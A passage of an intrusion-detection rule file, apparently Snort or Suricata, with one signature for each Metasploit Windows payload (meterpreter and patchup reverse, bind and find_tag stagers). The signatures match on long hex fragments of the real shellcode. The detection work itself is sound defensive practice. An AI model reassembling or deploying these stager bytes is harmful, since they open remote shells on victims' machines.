78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 31 db 53 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 c2 db 37 67 ff d5 53 57 68 b7 e9 38 ff ff d5 53 53 57 68 74 ec 3b e1 ff d5 57 97 68 75 6e 4d 61 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000132; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/find_tag"; flow:established; content:"| fc 33 ff 64 8b 47 30 8b 40 0c 8b 58 1c 8b 1b 8b 73 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6b 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 8b 5c 29 3c 03 dd 03 6c 29 24 57 66 47 8b f4 56 68 7f 66 04 40 57 ff d5 ad 85 c0 74 ee 99 52 b6 0c 52 56 57 ff d3 ad 3d |"; content:"| 75 dd ff e6 |"; sid:1000133; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/reverse_http"; flow:established; content:"| fc e8 ac 00 00 00 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 49 6e 74 65 72 6e 65 74 20 53 65 74 74 69 6e 67 73 5c 5a 6f 6e 65 73 5c 33 00 31 30 30 34 31 32 30 30 31 32 30 31 31 30 30 31 43 3a 5c 70 72 6f 67 72 61 7e 31 5c 69 6e 74 65 72 6e 7e 31 5c 69 65 78 70 6c 6f 72 65 20 2d 6e 65 77 20 68 74 74 70 3a 2f 2f |"; content:"| 3a 38 30 30 30 2f |"; content:"| 00 e8 4e 00 00 00 60 8b 6c 24 24 8b 45 3c 8b 7c 05 78 01 ef 8b 4f 18 8b 5f 20 01 eb e3 32 49 8b 34 8b 01 ee 31 c0 99 ac 84 c0 74 07 c1 ca 0d 01 c2 eb f4 3b 54 24 28 75 e3 8b 5f 24 01 eb 66 8b 0c 4b 8b 5f 1c 01 eb 8b 04 8b 01 e8 89 44 24 1c 61 c2 08 00 5f 5b 31 d2 64 8b 42 30 85 c0 78 0c 8b 40 0c 8b 70 1c ad 8b 40 08 eb 09 8b 40 34 83 c0 7c 8b 40 3c 89 e5 68 7e d8 e2 73 50 68 72 fe b3 16 50 68 8e 4e 0e ec 50 ff d7 96 ff d7 89 45 00 ff d7 89 45 04 52 68 70 69 33 32 |"; content:"| 68 61 64 76 61 54 ff d6 68 a9 2b 92 02 50 68 dd 9a 1c 2d 50 ff d7 89 45 08 ff d7 97 87 f3 54 56 68 01 00 00 |"; content:"| ff d7 5b 83 c6 44 50 89 e7 80 3e 43 74 1b 50 ad 50 89 e0 6a 04 57 6a 04 6a 00 50 53 ff 55 08 eb e8 8a 0d 30 00 fe 7f 88 0e 6a 54 59 29 cc 89 e7 57 f3 aa 5f c6 07 44 fe 47 2c fe 47 2d 68 75 6c 74 00 68 44 65 66 61 68 74 61 30 5c 68 57 69 6e 53 89 67 08 8d 5f 44 53 57 50 50 6a 10 50 50 50 56 50 ff 55 00 ff 55 04 |"; sid:1000134; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/reverse_https"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 6e 65 74 00 68 77 69 6e 69 89 e6 54 68 4c 77 26 07 ff d5 31 ff 57 57 57 57 56 68 3a 56 79 a7 ff d5 eb 5f 5b 31 c9 51 51 6a 03 51 51 68 |"; content:"| 00 00 00 53 50 68 57 89 9f c6 ff d5 eb 48 59 31 d2 52 68 00 32 e0 84 52 52 52 51 52 50 68 eb 55 2e 3b ff d5 89 c6 6a 02 5b 31 ff 57 57 57 57 56 68 2d 06 18 7b ff d5 85 c0 75 2e 4b 74 24 68 80 33 00 00 89 e0 6a 04 50 6a 1f 56 68 75 46 9e 86 ff d5 eb d5 eb 49 e8 b3 ff ff ff 2f 41 |"; content:"| 00 68 f0 b5 a2 56 ff d5 6a 40 68 00 10 00 00 68 00 00 40 00 57 68 58 a4 53 e5 ff d5 93 53 53 89 e7 57 68 00 20 00 00 53 56 68 12 96 89 |"; content:"| 85 c0 74 cd 8b 07 01 c3 85 c0 75 e5 58 c3 e8 51 ff ff ff |"; sid:1000135; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/reverse_ipv6_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 04 02 00 00 29 c4 48 48 54 50 68 29 80 6b 00 ff d5 50 50 50 6a 06 40 50 6a 17 68 ea 0f df e0 ff d5 89 c7 6a 1c e8 1c 00 00 00 17 00 00 |"; content:"| 00 00 00 00 fe 80 00 00 00 00 00 00 00 00 5e fe |"; content:"| 00 00 00 00 57 68 99 a5 74 61 ff d5 89 e6 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000136; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/reverse_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 68 |"; content:"| 66 53 89 e3 6a 10 53 57 66 b9 57 05 ff d6 50 b4 0c 50 53 57 53 66 b9 c0 38 ff e6 |"; sid:1000137; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/reverse_ord_tcp"; flow:established; content:"| fc 31 db 64 8b 43 30 8b 40 0c 8b 50 1c 8b 12 8b 72 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6a 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 01 e9 8b 41 58 01 e8 8b 71 3c 01 ee 03 69 0c 53 6a 01 6a 02 ff d0 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e1 53 b7 0c 53 51 57 51 6a 10 51 57 56 ff e5 |"; sid:1000138; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/reverse_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 6a 05 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 0c ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000139; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/reverse_tcp_allports"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 12 31 c0 66 8b 46 02 86 e0 66 40 86 e0 66 89 46 02 eb df 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000140; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/meterpreter/reverse_tcp_dns"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 eb 2f 68 a9 28 34 80 ff d5 8b 40 1c 6a 05 50 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 51 ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 e8 cc ff ff ff |"; content:"| 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 |"; content:"| 00 56 6a 00 68 |"; content:"| a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000141; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupdllinject/bind_ipv6_tcp"; flow:established; content:"| fc e8 56 00 00 00 53 55 56 57 8b 6c 24 18 8b 45 3c 8b 54 05 78 01 ea 8b 4a 18 8b 5a 20 01 eb e3 32 49 8b 34 8b 01 ee 31 ff fc 31 c0 ac 38 e0 74 07 c1 cf 0d 01 c7 eb f2 3b 7c 24 14 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 eb 02 31 c0 5f 5e 5d 5b c2 08 00 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 6a 18 59 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 81 ff 5b bc 4a 6a 8b 5a 10 8b 12 75 db 5e 53 68 8e 4e 0e ec ff d6 89 c7 53 68 54 ca af 91 ff d6 81 ec 00 01 00 00 50 57 56 53 89 e5 e8 27 00 00 00 90 01 00 00 b6 19 18 e7 ec f2 55 c0 e5 49 86 49 a4 1a 70 c7 a4 ad 2e e9 d9 09 f5 ad cb ed fc 3b 57 53 32 5f 33 32 00 5b 8d 4b 20 51 ff d7 89 df 89 c3 8d 75 14 6a 07 59 51 53 ff 34 8f ff 55 04 59 89 04 8e e2 f2 2b 27 54 68 02 02 00 00 ff 55 30 31 c0 50 50 50 6a 06 6a 01 6a 17 ff 55 2c 89 c7 6a 0a 89 e0 6a 04 50 6a 17 6a 29 57 ff 55 1c 58 68 00 00 00 00 31 c9 51 51 51 51 51 68 17 00 00 |"; content:"| 89 e1 6a 1c 51 57 ff 55 24 31 db 53 57 ff 55 28 53 53 57 ff 55 20 89 c7 6a 40 |"; content:"| 5e 56 c1 e6 06 56 c1 e6 08 56 6a 00 ff 55 0c 89 c3 6a 00 68 00 10 00 00 53 57 ff 55 18 ff d3 |"; sid:1000142; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupdllinject/bind_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 66 68 00 |"; content:"| 66 53 89 e1 6a 10 51 57 66 b9 80 3b ff d6 53 57 66 b9 75 49 ff d6 54 54 54 57 66 b9 32 4c ff d6 97 50 66 b9 33 ce ff d6 89 e1 50 b4 0c 50 51 57 51 66 b9 c0 38 ff e6 |"; sid:1000143; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupdllinject/bind_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 31 db 53 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 c2 db 37 67 ff d5 53 57 68 b7 e9 38 ff ff d5 53 53 57 68 74 ec 3b e1 ff d5 57 97 68 75 6e 4d 61 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000144; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupdllinject/find_tag"; flow:established; content:"| fc 33 ff 64 8b 47 30 8b 40 0c 8b 58 1c 8b 1b 8b 73 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6b 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 8b 5c 29 3c 03 dd 03 6c 29 24 57 66 47 8b f4 56 68 7f 66 04 40 57 ff d5 ad 85 c0 74 ee 99 52 b6 0c 52 56 57 ff d3 ad 3d |"; content:"| 75 dd ff e6 |"; sid:1000145; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupdllinject/reverse_ipv6_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 04 02 00 00 29 c4 48 48 54 50 68 29 80 6b 00 ff d5 50 50 50 6a 06 40 50 6a 17 68 ea 0f df e0 ff d5 89 c7 6a 1c e8 1c 00 00 00 17 00 00 |"; content:"| 00 00 00 00 fe 80 00 00 00 00 00 00 00 00 5e fe |"; content:"| 00 00 00 00 57 68 99 a5 74 61 ff d5 89 e6 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000146; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupdllinject/reverse_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 68 33 32 68 77 73 32 5f 54 66 b9 72 60 ff d6 95 53 53 53 53 43 53 43 53 89 e7 66 81 ef 08 02 57 53 66 b9 e7 df ff d6 66 b9 a8 6f ff d6 97 68 |"; content:"| 66 53 89 e3 6a 10 53 57 66 b9 57 05 ff d6 50 b4 0c 50 53 57 53 66 b9 c0 38 ff e6 |"; sid:1000147; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupdllinject/reverse_ord_tcp"; flow:established; content:"| fc 31 db 64 8b 43 30 8b 40 0c 8b 50 1c 8b 12 8b 72 20 ad ad 4e 03 06 3d 32 33 5f 32 75 ef 8b 6a 08 8b 45 3c 8b 4c 05 78 8b 4c 0d 1c 01 e9 8b 41 58 01 e8 8b 71 3c 01 ee 03 69 0c 53 6a 01 6a 02 ff d0 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e1 53 b7 0c 53 51 57 51 6a 10 51 57 56 ff e5 |"; sid:1000148; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupdllinject/reverse_tcp"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 6a 05 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 0c ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000149; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupdllinject/reverse_tcp_allports"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 68 |"; content:"| 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 12 31 c0 66 8b 46 02 86 e0 66 40 86 e0 66 89 46 02 eb df 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 00 56 6a 00 68 58 a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000150; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupdllinject/reverse_tcp_dns"; flow:established; content:"| fc e8 89 00 00 00 60 89 e5 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 0f b7 4a 26 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 52 57 8b 52 10 8b 42 3c 01 d0 8b 40 78 85 c0 74 4a 01 d0 50 8b 48 18 8b 58 20 01 d3 e3 3c 49 8b 34 8b 01 d6 31 ff 31 c0 ac c1 cf 0d 01 c7 38 e0 75 f4 03 7d f8 3b 7d 24 75 e2 58 8b 58 24 01 d3 66 8b 0c 4b 8b 58 1c 01 d3 8b 04 8b 01 d0 89 44 24 24 5b 5b 61 59 5a 51 ff e0 58 5f 5a 8b 12 eb 86 5d 68 33 32 00 00 68 77 73 32 5f 54 68 4c 77 26 07 ff d5 b8 90 01 00 00 29 c4 54 50 68 29 80 6b 00 ff d5 50 50 50 50 40 50 40 50 68 ea 0f df e0 ff d5 97 eb 2f 68 a9 28 34 80 ff d5 8b 40 1c 6a 05 50 68 02 00 00 |"; content:"| 89 e6 6a 10 56 57 68 99 a5 74 61 ff d5 85 c0 74 51 ff 4e 08 75 ec 68 f0 b5 a2 56 ff d5 e8 cc ff ff ff |"; content:"| 00 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 00 6a 00 6a 04 56 57 68 02 d9 c8 5f ff d5 8b 36 6a 40 68 00 10 00 |"; content:"| 00 56 6a 00 68 |"; content:"| a4 53 e5 ff d5 93 53 6a 00 56 53 57 68 02 d9 c8 5f ff d5 01 c3 29 c6 85 f6 75 ec c3 |"; sid:1000151; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupmeterpreter/bind_ipv6_tcp"; flow:established; content:"| fc e8 56 00 00 00 53 55 56 57 8b 6c 24 18 8b 45 3c 8b 54 05 78 01 ea 8b 4a 18 8b 5a 20 01 eb e3 32 49 8b 34 8b 01 ee 31 ff fc 31 c0 ac 38 e0 74 07 c1 cf 0d 01 c7 eb f2 3b 7c 24 14 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 eb 02 31 c0 5f 5e 5d 5b c2 08 00 31 d2 64 8b 52 30 8b 52 0c 8b 52 14 8b 72 28 6a 18 59 31 ff 31 c0 ac 3c 61 7c 02 2c 20 c1 cf 0d 01 c7 e2 f0 81 ff 5b bc 4a 6a 8b 5a 10 8b 12 75 db 5e 53 68 8e 4e 0e ec ff d6 89 c7 53 68 54 ca af 91 ff d6 81 ec 00 01 00 00 50 57 56 53 89 e5 e8 27 00 00 00 90 01 00 00 b6 19 18 e7 ec f2 55 c0 e5 49 86 49 a4 1a 70 c7 a4 ad 2e e9 d9 09 f5 ad cb ed fc 3b 57 53 32 5f 33 32 00 5b 8d 4b 20 51 ff d7 89 df 89 c3 8d 75 14 6a 07 59 51 53 ff 34 8f ff 55 04 59 89 04 8e e2 f2 2b 27 54 68 02 02 00 00 ff 55 30 31 c0 50 50 50 6a 06 6a 01 6a 17 ff 55 2c 89 c7 6a 0a 89 e0 6a 04 50 6a 17 6a 29 57 ff 55 1c 58 68 00 00 00 00 31 c9 51 51 51 51 51 68 17 00 00 |"; content:"| 89 e1 6a 1c 51 57 ff 55 24 31 db 53 57 ff 55 28 53 53 57 ff 55 20 89 c7 6a 40 |"; content:"| 5e 56 c1 e6 06 56 c1 e6 08 56 6a 00 ff 55 0c 89 c3 6a 00 68 00 10 00 00 53 57 ff 55 18 ff d3 |"; sid:1000152; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"windows/patchupmeterpreter/bind_nonx_tcp"; flow:established; content:"| fc 6a eb 47 e8 f9 ff ff ff 60 31 db 8b 7d 3c 8b 7c 3d 78 01 ef 8b 57 20 01 ea 8b 34 9a 01 ee 31 c0 99 ac c1 ca 0d 01 c2 84 c0 75 f6 43 66 39 ca 75 e3 4b 8b 4f 24 01 e9 66 8b 1c 59 8b 4f 1c 01 e9 03 2c 99 89 6c 24 1c 61 ff e0 31 db 64 8b 43 30 8b 40 0c 8b 70 1c ad 8b 68 08 5e 66 53 66 